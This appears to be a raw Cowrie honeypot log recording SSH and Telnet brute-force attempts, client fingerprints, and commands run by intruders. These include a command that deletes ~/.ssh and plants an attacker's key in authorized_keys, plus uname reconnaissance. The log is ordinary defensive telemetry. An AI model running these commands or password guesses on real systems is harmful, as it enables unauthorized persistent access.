{"eventid":"cowrie.session.connect","src_ip":"88.214.25.124","src_port":65126,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1bac4717956","protocol":"ssh","message":"New connection: 88.214.25.124:65126 (1.2.3.4:22) [session: c1bac4717956]","sensor":"my-vps","timestamp":"2025-08-31T01:10:24.627021Z"}
{"eventid":"cowrie.client.version","version":"\u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","message":"Remote SSH version: \u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","sensor":"my-vps","timestamp":"2025-08-31T01:10:24.628048Z","src_ip":"88.214.25.124","session":"c1bac4717956"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:24.629013Z","src_ip":"88.214.25.124","session":"c1bac4717956"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53231,"dst_ip":"1.2.3.4","dst_port":23,"session":"4aadf42bda2c","protocol":"telnet","message":"New connection: 212.227.235.229:53231 (1.2.3.4:23) [session: 4aadf42bda2c]","sensor":"my-vps","timestamp":"2025-08-31T01:10:24.880465Z"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":33459,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ddc00452b55","protocol":"ssh","message":"New connection: 102.88.137.80:33459 (1.2.3.4:22) [session: 8ddc00452b55]","sensor":"my-vps","timestamp":"2025-08-31T01:10:27.422559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:10:27.423969Z","src_ip":"102.88.137.80","session":"8ddc00452b55"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:10:27.546595Z","src_ip":"102.88.137.80","session":"8ddc00452b55"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd@2023","message":"login attempt [root/P@ssw0rd@2023] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:10:28.076550Z","src_ip":"102.88.137.80","session":"8ddc00452b55"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:10:28.342785Z","src_ip":"102.88.137.80","session":"8ddc00452b55"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:10:28.343594Z","src_ip":"102.88.137.80","session":"8ddc00452b55"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:10:28.344821Z","src_ip":"102.88.137.80","session":"8ddc00452b55"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:28.468366Z","src_ip":"102.88.137.80","session":"8ddc00452b55"}
{"eventid":"cowrie.login.failed","username":"dev","password":"12345","message":"login attempt [dev/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T01:10:28.734075Z","src_ip":"212.227.235.229","session":"d6aa6374a39a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:10:28.772515Z","src_ip":"102.88.137.80","session":"8ddc00452b55"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:10:28.773215Z","src_ip":"102.88.137.80","session":"8ddc00452b55"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:10:28.899182Z","src_ip":"102.88.137.80","session":"8ddc00452b55"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:28.900150Z","src_ip":"102.88.137.80","session":"8ddc00452b55"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1495,"dst_ip":"1.2.3.4","dst_port":22,"session":"9007c0c61717","protocol":"ssh","message":"New connection: 102.88.137.80:1495 (1.2.3.4:22) [session: 9007c0c61717]","sensor":"my-vps","timestamp":"2025-08-31T01:10:29.021046Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:10:29.022125Z","src_ip":"102.88.137.80","session":"9007c0c61717"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:10:29.144799Z","src_ip":"102.88.137.80","session":"9007c0c61717"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:10:29.676768Z","src_ip":"102.88.137.80","session":"9007c0c61717"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:30.620972Z","src_ip":"212.227.235.229","session":"d6aa6374a39a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:30.802010Z","src_ip":"102.88.137.80","session":"9007c0c61717"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1496,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee6bbbffa211","protocol":"ssh","message":"New connection: 102.88.137.80:1496 (1.2.3.4:22) [session: ee6bbbffa211]","sensor":"my-vps","timestamp":"2025-08-31T01:10:30.923815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:10:30.924523Z","src_ip":"102.88.137.80","session":"ee6bbbffa211"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:10:31.047588Z","src_ip":"102.88.137.80","session":"ee6bbbffa211"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:10:31.580741Z","src_ip":"102.88.137.80","session":"ee6bbbffa211"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:31.704734Z","src_ip":"102.88.137.80","session":"8ddc00452b55"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:31.705837Z","src_ip":"102.88.137.80","session":"ee6bbbffa211"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35232,"dst_ip":"1.2.3.4","dst_port":22,"session":"826246d80e0a","protocol":"ssh","message":"New connection: 212.227.125.160:35232 (1.2.3.4:22) [session: 826246d80e0a]","sensor":"my-vps","timestamp":"2025-08-31T01:10:32.811679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:10:32.812912Z","src_ip":"212.227.125.160","session":"826246d80e0a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:10:32.886918Z","src_ip":"212.227.125.160","session":"826246d80e0a"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:10:33.110576Z","src_ip":"212.227.125.160","session":"826246d80e0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:10:33.446064Z","src_ip":"212.227.125.160","session":"826246d80e0a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:10:33.446769Z","src_ip":"212.227.125.160","session":"826246d80e0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:33.522166Z","src_ip":"212.227.125.160","session":"826246d80e0a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:33.523371Z","src_ip":"212.227.125.160","session":"826246d80e0a"}
{"eventid":"cowrie.session.closed","duration":13.165900707244873,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:38.046296Z","src_ip":"212.227.235.229","session":"4aadf42bda2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54520,"dst_ip":"1.2.3.4","dst_port":22,"session":"39add6109da1","protocol":"ssh","message":"New connection: 212.227.235.229:54520 (1.2.3.4:22) [session: 39add6109da1]","sensor":"my-vps","timestamp":"2025-08-31T01:10:41.727894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:10:41.730940Z","src_ip":"212.227.235.229","session":"39add6109da1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:10:41.970572Z","src_ip":"212.227.235.229","session":"39add6109da1"}
{"eventid":"cowrie.login.failed","username":"shadow","password":"123shadow123","message":"login attempt [shadow/123shadow123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:10:42.929926Z","src_ip":"212.227.235.229","session":"39add6109da1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47302,"dst_ip":"1.2.3.4","dst_port":22,"session":"1af2ccc9df32","protocol":"ssh","message":"New connection: 212.227.125.160:47302 (1.2.3.4:22) [session: 1af2ccc9df32]","sensor":"my-vps","timestamp":"2025-08-31T01:10:43.261406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:10:43.262179Z","src_ip":"212.227.125.160","session":"1af2ccc9df32"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:10:43.336101Z","src_ip":"212.227.125.160","session":"1af2ccc9df32"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:10:43.603249Z","src_ip":"212.227.125.160","session":"1af2ccc9df32"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:44.167438Z","src_ip":"212.227.235.229","session":"39add6109da1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:44.758492Z","src_ip":"212.227.125.160","session":"1af2ccc9df32"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39716,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccd2691c9585","protocol":"ssh","message":"New connection: 212.227.125.160:39716 (1.2.3.4:22) [session: ccd2691c9585]","sensor":"my-vps","timestamp":"2025-08-31T01:10:45.117842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:10:45.449752Z","src_ip":"212.227.125.160","session":"ccd2691c9585"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:10:45.450519Z","src_ip":"212.227.125.160","session":"ccd2691c9585"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55110,"dst_ip":"1.2.3.4","dst_port":22,"session":"6feecd4f5bc0","protocol":"ssh","message":"New connection: 212.227.235.229:55110 (1.2.3.4:22) [session: 6feecd4f5bc0]","sensor":"my-vps","timestamp":"2025-08-31T01:10:46.439138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:10:46.440055Z","src_ip":"212.227.235.229","session":"6feecd4f5bc0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["s